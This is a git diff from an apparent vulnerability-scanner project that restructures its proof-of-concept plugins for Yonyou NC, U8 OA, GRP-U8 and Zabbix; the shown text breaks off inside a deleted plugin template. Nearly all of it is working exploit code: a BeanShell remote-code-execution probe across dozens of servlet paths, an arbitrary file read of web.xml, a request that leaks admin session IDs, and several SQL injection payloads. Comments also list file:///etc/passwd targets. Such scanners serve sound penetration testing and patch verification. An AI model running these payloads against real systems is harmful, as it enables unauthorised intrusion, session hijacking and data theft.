-    {'path': 'service/~iufo/bsh.servlet.BshServlet'},
-    {'path': 'service/~modules/bsh.servlet.BshServlet'},
-    {'path': 'service/~mpp/bsh.servlet.BshServlet'},
-    {'path': 'service/~obm/bsh.servlet.BshServlet'},
-    {'path': 'service/~pu/bsh.servlet.BshServlet'},
-    {'path': 'service/~qc/bsh.servlet.BshServlet'},
-    {'path': 'service/~sc/bsh.servlet.BshServlet'},
-    {'path': 'service/~scmpub/bsh.servlet.BshServlet'},
-    {'path': 'service/~so/bsh.servlet.BshServlet'},
-    {'path': 'service/~so2/bsh.servlet.BshServlet'},
-    {'path': 'service/~so3/bsh.servlet.BshServlet'},
-    {'path': 'service/~so4/bsh.servlet.BshServlet'},
-    {'path': 'service/~so5/bsh.servlet.BshServlet'},
-    {'path': 'service/~so6/bsh.servlet.BshServlet'},
-    {'path': 'service/~tam/bsh.servlet.BshServlet'},
-    {'path': 'service/~tbb/bsh.servlet.BshServlet'},
-    {'path': 'service/~to/bsh.servlet.BshServlet'},
-    {'path': 'service/~uap/bsh.servlet.BshServlet'},
-    {'path': 'service/~uapbd/bsh.servlet.BshServlet'},
-    {'path': 'service/~uapde/bsh.servlet.BshServlet'},
-    {'path': 'service/~uapeai/bsh.servlet.BshServlet'},
-    {'path': 'service/~uapother/bsh.servlet.BshServlet'},
-    {'path': 'service/~uapqe/bsh.servlet.BshServlet'},
-    {'path': 'service/~uapweb/bsh.servlet.BshServlet'},
-    {'path': 'service/~uapws/bsh.servlet.BshServlet'},
-    {'path': 'service/~vrm/bsh.servlet.BshServlet'},
-    {'path': 'service/~yer/bsh.servlet.BshServlet'},
-]
-
-def cnvd_2021_30167_scan(clients):
-    ''' 用友NC BeanShell远程命令执行漏洞
-            给了一个命令执行的页面, 在框框内输入命令, 然后点击按钮就可以运行任意代码
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Yonyou-NC',
-        'vul_type': 'RCE',
-        'vul_id': 'CNVD-2021-30167',
-    }
-    
-    baseData = 'bsh.script=print%28{}*{}%29%3B'
-
-    for payload in cnvd_2021_30167_payloads:
-        randomNum_1, randomNum_2 = random_int_2()
-        
-        path = payload['path']
-        data = baseData.format(randomNum_1, randomNum_2)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        randomNum_sum = str(randomNum_1 * randomNum_2)
-        if (randomNum_sum in res.text):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Yonyou/main.py b/payloads/Yonyou/main.py
deleted file mode 100644
index 228b50c..0000000
--- a/payloads/Yonyou/main.py
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Yonyou扫描类: 
-        1. 用友NC BeanShell远程命令执行漏洞
-            CNVD-2021-30167
-                Payload: https://mp.weixin.qq.com/s/XivX5eWGxYoUzpfhWDuNCw
-
-        2. 用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历
-            暂无编号
-
-        3. 用友U8 OA getSessionList.jsp 敏感信息泄漏
-            暂无编号
-                Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
-
-        4. 用友U8 OA test.jsp SQL注入
-            暂无编号
-                Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
-
-        5. 用友GRP-U8 Proxy SQL注入 
-            CNNVD-201610-923
-                Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
-
-
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Yonyou.cnnvd_201610_923 import cnnvd_201610_923_scan
-from payloads.Yonyou.cnvd_2021_30167 import cnvd_2021_30167_scan
-from payloads.Yonyou.nc_fileread import nc_fileRead_scan
-from payloads.Yonyou.u8_oa_getsession import u8_oa_getsession_scan
-from payloads.Yonyou.u8_oa_test_sqlinject import u8_oa_test_sqlinject_scan
-
-class Yonyou():
-    def __init__(self):
-        self.app_name = 'Yonyou'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cnnvd_201610_923_scan, clients=clients),
-            thread(target=cnvd_2021_30167_scan, clients=clients),
-            thread(target=nc_fileRead_scan, clients=clients),
-            thread(target=u8_oa_getsession_scan, clients=clients),
-            thread(target=u8_oa_test_sqlinject_scan, clients=clients),
-        ]
-
-yonyou = Yonyou()
diff --git a/payloads/Yonyou/nc_fileread.py b/payloads/Yonyou/nc_fileread.py
deleted file mode 100644
index 1c21e0a..0000000
--- a/payloads/Yonyou/nc_fileread.py
+++ /dev/null
@@ -1,38 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-yonyou_nc_fileRead_payloads = [
-    {'path': 'NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml'},
-]
-
-def nc_fileRead_scan(clients):
-    ''' 用友ERP-NC NCFindWeb接口任意文件读取/下载漏洞
-            也可以目录遍历
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Yonyou-ERP-NC',
-        'vul_type': 'FileRead',
-        'vul_id': 'NC-fileRead',
-    }
-
-    for payload in yonyou_nc_fileRead_payloads:
-        path = payload['path']
-        
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('nc.bs.framework.server' in res.text) or ('WebApplicationStartupHook' in res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['vul_type'], vul_info['app_name'], vul_info['vul_id']],
-                'Request': res,
-            }
-            return results
-    return None
diff --git a/payloads/Yonyou/u8_oa_getsession.py b/payloads/Yonyou/u8_oa_getsession.py
deleted file mode 100644
index edc28a4..0000000
--- a/payloads/Yonyou/u8_oa_getsession.py
+++ /dev/null
@@ -1,41 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-import re
-
-yonyou_u8_oa_getsession_payloads = [
-    {'path': 'yyoa/ext/https/getSessionList.jsp?cmd=getAll'},
-    {'path': 'getSessionList.jsp?cmd=getAll'},
-]
-
-def u8_oa_getsession_scan(clients):
-    '''  通过该漏洞, 攻击者可以获取数据库中管理员的账户信息以及session, 可利用session登录相关账号 '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-       'app_name': 'Yonyou-U8-OA',
-       'vul_type': 'DSinfo',
-       'vul_id': 'Yonyou-u8-getSessionList-unAuth',
-    }
-
-    for payload in yonyou_u8_oa_getsession_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        session_re = r'([0-9A-Z]{32})+'
-        if (re.search(session_re, res.text, re.M|re.U)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Yonyou/u8_oa_test_sqlinject.py b/payloads/Yonyou/u8_oa_test_sqlinject.py
deleted file mode 100644
index ec48323..0000000
--- a/payloads/Yonyou/u8_oa_test_sqlinject.py
+++ /dev/null
@@ -1,38 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-yonyou_u8_oa_test_sqlinject_payloads = [
-    {'path': 'yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))'},
-    {'path': 'test.jsp?doType=101&S1=(SELECT%20MD5(1))'},
-]
-
-def u8_oa_test_sqlinject_scan(clients):
-    ''' 由于与致远OA使用相同的文件, 于是存在同样的漏洞 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Yonyou-U8-OA',
-        'vul_type': 'SQLinject',
-        'vul_id': 'Yonyou-u8-test.jsp-sqlinject',
-    }
-
-    for payload in yonyou_u8_oa_test_sqlinject_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if ('c4ca4238a0b923820dcc509a6f75849b' in res.text):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Yonyou/yonyou-erp-nc-ncfindweb-fileread.py b/payloads/Yonyou/yonyou-erp-nc-ncfindweb-fileread.py
new file mode 100644
index 0000000..b685e4c
--- /dev/null
+++ b/payloads/Yonyou/yonyou-erp-nc-ncfindweb-fileread.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历
+    暂无编号
+
+用友ERP-NC NCFindWeb接口任意文件读取/下载漏洞
+    也可以目录遍历
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Yonyou-ERP-NC',
+            'vul_type': 'FileRead',
+            'vul_id': 'NC-fileRead',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('nc.bs.framework.server' in res.text) or ('WebApplicationStartupHook' in res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['vul_type'], vul_info['app_name'], vul_info['vul_id']],
+                    'Request': res,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Yonyou/yonyou-grp-u8-cnnvd-201610-923-sqlinject.py b/payloads/Yonyou/yonyou-grp-u8-cnnvd-201610-923-sqlinject.py
new file mode 100644
index 0000000..c6063f4
--- /dev/null
+++ b/payloads/Yonyou/yonyou-grp-u8-cnnvd-201610-923-sqlinject.py
@@ -0,0 +1,67 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+用友GRP-U8 Proxy SQL注入 
+    CNNVD-201610-923
+        Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
+
+用友GRP-u8存在XXE漏洞
+    该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载, 导致可加载外部SQL语句
+'''
+
+import re
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'Proxy',
+                'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
+            },
+            {
+                'path': 'Proxy',
+                'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>'
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Yonyou-GRP-U8',
+            'vul_type': 'SQLinject/RCE',
+            'vul_id': 'CNNVD-201610-923',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+            
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            version_re = r'column[1-4]{1}="Microsoft SQL Server \d{1,5} -.*Copyright.*Microsoft Corporation.*"'
+
+            if (re.search(version_re, res.text, re.I|re.M|re.S|re.U)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Yonyou/yonyou-nc-cnvd-2021-30167-rce.py b/payloads/Yonyou/yonyou-nc-cnvd-2021-30167-rce.py
new file mode 100644
index 0000000..b926fef
--- /dev/null
+++ b/payloads/Yonyou/yonyou-nc-cnvd-2021-30167-rce.py
@@ -0,0 +1,121 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+用友NC BeanShell远程命令执行漏洞
+    CNVD-2021-30167
+        Payload: https://mp.weixin.qq.com/s/XivX5eWGxYoUzpfhWDuNCw
+
+用友NC BeanShell远程命令执行漏洞
+    给了一个命令执行的页面, 在框框内输入命令, 然后点击按钮就可以运行任意代码
+'''
+
+from lib.tool.md5 import random_int_2
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'servlet/~ic/bsh.servlet.BshServlet',
+                # 'data': 'bsh.script=print%28{}*{}%29%3B'.format(randomNum_1, randomNum_2)
+            },
+            {'path': 'service/~aim/bsh.servlet.BshServlet'},
+            {'path': 'service/~alm/bsh.servlet.BshServlet'},
+            {'path': 'service/~ampub/bsh.servlet.BshServlet'},
+            {'path': 'service/~arap/bsh.servlet.BshServlet'},
+            {'path': 'service/~aum/bsh.servlet.BshServlet'},
+            {'path': 'service/~cc/bsh.servlet.BshServlet'},
+            {'path': 'service/~cdm/bsh.servlet.BshServlet'},
+            {'path': 'service/~cmp/bsh.servlet.BshServlet'},
+            {'path': 'service/~ct/bsh.servlet.BshServlet'},
+            {'path': 'service/~dm/bsh.servlet.BshServlet'},
+            {'path': 'service/~erm/bsh.servlet.BshServlet'},
+            {'path': 'service/~fa/bsh.servlet.BshServlet'},
+            {'path': 'service/~fac/bsh.servlet.BshServlet'},
+            {'path': 'service/~fbm/bsh.servlet.BshServlet'},
+            {'path': 'service/~ff/bsh.servlet.BshServlet'},
+            {'path': 'service/~fip/bsh.servlet.BshServlet'},
+            {'path': 'service/~fipub/bsh.servlet.BshServlet'},
+            {'path': 'service/~fp/bsh.servlet.BshServlet'},
+            {'path': 'service/~fts/bsh.servlet.BshServlet'},
+            {'path': 'service/~fvm/bsh.servlet.BshServlet'},
+            {'path': 'service/~gl/bsh.servlet.BshServlet'},
+            {'path': 'service/~hrhi/bsh.servlet.BshServlet'},
+            {'path': 'service/~hrjf/bsh.servlet.BshServlet'},
+            {'path': 'service/~hrpd/bsh.servlet.BshServlet'},
+            {'path': 'service/~hrpub/bsh.servlet.BshServlet'},
+            {'path': 'service/~hrtrn/bsh.servlet.BshServlet'},
+            {'path': 'service/~hrwa/bsh.servlet.BshServlet'},
+            {'path': 'service/~ia/bsh.servlet.BshServlet'},
+            {'path': 'service/~ic/bsh.servlet.BshServlet'},
+            {'path': 'service/~iufo/bsh.servlet.BshServlet'},
+            {'path': 'service/~modules/bsh.servlet.BshServlet'},
+            {'path': 'service/~mpp/bsh.servlet.BshServlet'},
+            {'path': 'service/~obm/bsh.servlet.BshServlet'},
+            {'path': 'service/~pu/bsh.servlet.BshServlet'},
+            {'path': 'service/~qc/bsh.servlet.BshServlet'},
+            {'path': 'service/~sc/bsh.servlet.BshServlet'},
+            {'path': 'service/~scmpub/bsh.servlet.BshServlet'},
+            {'path': 'service/~so/bsh.servlet.BshServlet'},
+            {'path': 'service/~so2/bsh.servlet.BshServlet'},
+            {'path': 'service/~so3/bsh.servlet.BshServlet'},
+            {'path': 'service/~so4/bsh.servlet.BshServlet'},
+            {'path': 'service/~so5/bsh.servlet.BshServlet'},
+            {'path': 'service/~so6/bsh.servlet.BshServlet'},
+            {'path': 'service/~tam/bsh.servlet.BshServlet'},
+            {'path': 'service/~tbb/bsh.servlet.BshServlet'},
+            {'path': 'service/~to/bsh.servlet.BshServlet'},
+            {'path': 'service/~uap/bsh.servlet.BshServlet'},
+            {'path': 'service/~uapbd/bsh.servlet.BshServlet'},
+            {'path': 'service/~uapde/bsh.servlet.BshServlet'},
+            {'path': 'service/~uapeai/bsh.servlet.BshServlet'},
+            {'path': 'service/~uapother/bsh.servlet.BshServlet'},
+            {'path': 'service/~uapqe/bsh.servlet.BshServlet'},
+            {'path': 'service/~uapweb/bsh.servlet.BshServlet'},
+            {'path': 'service/~uapws/bsh.servlet.BshServlet'},
+            {'path': 'service/~vrm/bsh.servlet.BshServlet'},
+            {'path': 'service/~yer/bsh.servlet.BshServlet'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'Yonyou-NC',
+            'vul_type': 'RCE',
+            'vul_id': 'CNVD-2021-30167',
+        }
+        
+        baseData = 'bsh.script=print%28{}*{}%29%3B'
+
+        for payload in self.payloads:
+            randomNum_1, randomNum_2 = random_int_2()
+            
+            path = payload['path']
+            data = baseData.format(randomNum_1, randomNum_2)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            randomNum_sum = str(randomNum_1 * randomNum_2)
+            if (randomNum_sum in res.text):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Yonyou/yonyou-u8-oa-getsession-dsinfo.py b/payloads/Yonyou/yonyou-u8-oa-getsession-dsinfo.py
new file mode 100644
index 0000000..1117b20
--- /dev/null
+++ b/payloads/Yonyou/yonyou-u8-oa-getsession-dsinfo.py
@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+用友U8 OA getSessionList.jsp 敏感信息泄漏
+    暂无编号
+        Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
+
+通过该漏洞, 攻击者可以获取数据库中管理员的账户信息以及session, 可利用session登录相关账号
+'''
+
+import re
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'yyoa/ext/https/getSessionList.jsp?cmd=getAll'},
+            {'path': 'getSessionList.jsp?cmd=getAll'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+        'app_name': 'Yonyou-U8-OA',
+        'vul_type': 'DSinfo',
+        'vul_id': 'Yonyou-u8-getSessionList-unAuth',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            session_re = r'([0-9A-Z]{32})+'
+            if (re.search(session_re, res.text, re.M|re.U)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Yonyou/yonyou-u8-oa-test.jsp-sqlinject.py b/payloads/Yonyou/yonyou-u8-oa-test.jsp-sqlinject.py
new file mode 100644
index 0000000..64bdc2e
--- /dev/null
+++ b/payloads/Yonyou/yonyou-u8-oa-test.jsp-sqlinject.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+用友U8 OA test.jsp SQL注入
+    暂无编号
+        Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
+
+由于与致远OA使用相同的文件, 于是存在同样的漏洞
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))'},
+            {'path': 'test.jsp?doType=101&S1=(SELECT%20MD5(1))'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Yonyou-U8-OA',
+            'vul_type': 'SQLinject',
+            'vul_id': 'Yonyou-u8-test.jsp-sqlinject',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if ('c4ca4238a0b923820dcc509a6f75849b' in res.text):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Zabbix/cve_2016_10134.py b/payloads/Zabbix/cve_2016_10134.py
deleted file mode 100644
index cb78bcf..0000000
--- a/payloads/Zabbix/cve_2016_10134.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import md5, random_int_1
-
-cve_2016_10134_payloads = [
-    {'path': 'jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0x7c,md5({NUM})),0)'},
-    {'path': 'jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({NUM})),0)'},
-]
-
-def cve_2016_10134_scan(clients):
-    ''' latest.php中的toggle_ids[] 或 jsrpc.php中的profieldx2参数
-            存在sql注入, 通过sql注入获取管理员账户密码, 进入后台进行getshell操作
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Zabbix',
-        'vul_type': 'SQLinject',
-        'vul_id': 'CVE-2016-10134',
-    }
-
-    for payload in cve_2016_10134_payloads:
-        random_num = random_int_1()                # * 随机数字
-
-        path = payload['path'].format(NUM=random_num)
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        md = md5(str(random_num), 31)   # * 计算随机数字的md5值, 取31位(0-30)
-
-        if (md in res.text):            # * 如果计算的md5值, 在响应包的回显中找到了, 说明SQL注入的md5()函数执行了, 存在漏洞
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Zabbix/main.py b/payloads/Zabbix/main.py
deleted file mode 100644
index cbdc780..0000000
--- a/payloads/Zabbix/main.py
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-zabbix是一款服务器监控软件, 其由server、agent、web等模块组成, 其中web模块由PHP编写, 用来显示数据库中的结果
-    Zabbix扫描类: 
-        1. zabbix latest.php SQL注入
-            CVE-2016-10134
-                Payload: https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
-
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Zabbix.cve_2016_10134 import cve_2016_10134_scan
-
-class Zabbix():
-    def __init__(self):
-        self.app_name = 'Zabbix'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2016_10134_scan, clients=clients)
-        ]
-
-zabbix = Zabbix()
diff --git a/payloads/Zabbix/zabbix-cve-2016-10134-sqlinject.py b/payloads/Zabbix/zabbix-cve-2016-10134-sqlinject.py
new file mode 100644
index 0000000..2f3d5f0
--- /dev/null
+++ b/payloads/Zabbix/zabbix-cve-2016-10134-sqlinject.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+zabbix latest.php SQL注入
+    CVE-2016-10134
+        Payload: https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
+
+latest.php中的toggle_ids[] 或 jsrpc.php中的profieldx2参数
+    存在sql注入, 通过sql注入获取管理员账户密码, 进入后台进行getshell操作
+'''
+
+from lib.tool.md5 import md5, random_int_1
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0x7c,md5({NUM})),0)'},
+            {'path': 'jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({NUM})),0)'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Zabbix',
+            'vul_type': 'SQLinject',
+            'vul_id': 'CVE-2016-10134',
+        }
+
+        for payload in self.payloads:
+            random_num = random_int_1()                # * 随机数字
+
+            path = payload['path'].format(NUM=random_num)
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            md = md5(str(random_num), 31)   # * 计算随机数字的md5值, 取31位(0-30)
+
+            if (md in res.text):            # * 如果计算的md5值, 在响应包的回显中找到了, 说明SQL注入的md5()函数执行了, 存在漏洞
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/demo/main.py b/payloads/demo/main.py
deleted file mode 100644
index 8cbdefb..0000000
--- a/payloads/demo/main.py
+++ /dev/null
@@ -1,43 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-XXX是一款...
-    XXXXX扫描类: 
-        XXXXX 未开启强制路由RCE
-            CNVD-2018-24942
-                Payload: https://xxx
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-from lib.initial.config import config
-from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2
-from lib.tool.thread import thread
-from lib.tool import head
-from payloads.demo.scan import 6_scan                           # ! 6: POC的名称
-
-class 1():                                                      # ! 1: 类名(例如 ThinkPHP)
-    ''' 标有数字的地方都需要自己填写 '''
-    def __init__(self):
-        self.app_name = '2'                                     # ! 2: 漏洞框架/应用程序/CMS等(例如 thinkphp)
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=6_scan, clients=clients)              # ! 6: 同上, POC的名称
-        ]
-
-13 = 1()                                                        # ! 1: 同上, 类名
-
-'''
-    # ! 13: 对象名称
-    # ! 在vulcat/config.yaml添加对象名称
-    # ! 然后在vulcat/lib/core/coreScan.py引入POC, 引入方式为
-                                                        from payloads.文件名 import 对象名称
-    # ! 引入完成后, 自定义POC就成功了, 可以运行vulcat试试效果
-'''
\ No newline at end of file
diff --git a/payloads/demo/scan.py b/payloads/demo/scan.py
deleted file mode 100644
index b172916..0000000
--- a/payloads/demo/scan.py
+++ /dev/null
@@ -1,71 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2
-from lib.tool import check
-from time import sleep
-import re
-
-3_payloads = [                                  # ! 3: Payload的名称(例如 cnvd_2018_24942_payloads)
-    {
-        'path': '4',                            # ! 4: url路径(例如/admin/login)
-        'data': '5',                            # ! 5: POST数据, 没有的话可以不写
-    },
-]
-
-def 6_scan(clients):                            # ! 6: POC的名称(例如 cnvd_2018_24942_scan)
-    '''  '''
-    client = clients.get('reqClient')           # todo 使用的中转, reqClient是requests的中转
-    # hackClient = clients.get('hackClient')      # todo 使用的中转, hackClient是HackRequests的中转
-    
-    vul_info = {
-        'app_name': '',
-        'vul_type': '7',                        # ! 7: 漏洞类型(例如 RCE)
-        'vul_id': '8',                          # ! 8: 漏洞编号(例如 CNVD-2018-24942)
-    }
-    
-    headers = {}                                # ! 9. 如果该漏洞需要特殊的Headers,例如 User-Agent:Nacos-Server, 则需要填写, 没有的话就不用填
-
-    for payload in 3_payloads:                  # ! 3: 同上, Payload的名称
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'get',                              # ! 10: 请求方式, 例如get, 不区分大小写
-            path,                               # ! 11: 路径, 注意 “只要路径”, 不需要添加http://xxx.com
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        # todo 判断
-        '''!!!
-            可以自定义results中的信息, 格式:
-                标题: 值(str/list/dict)
-                    str类型: key: value的格式进行显示
-                    list类型: 会以key: value value value ...的格式进行显示
-                    dict类型: 会以↓的格式进行显示
-                            dict:
-                                key1: value1
-                                key2: value2
-                                ...
-                    Response类型: 会以一个http数据包的格式进行显示
-        '''
-        if ('12'):               # ! 12: 判断扫描结果
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Payload': {
-                    'Url': res.url,
-                    'Path': path,
-                    'Headers': headers,
-                    'Cookie': 'XXX'
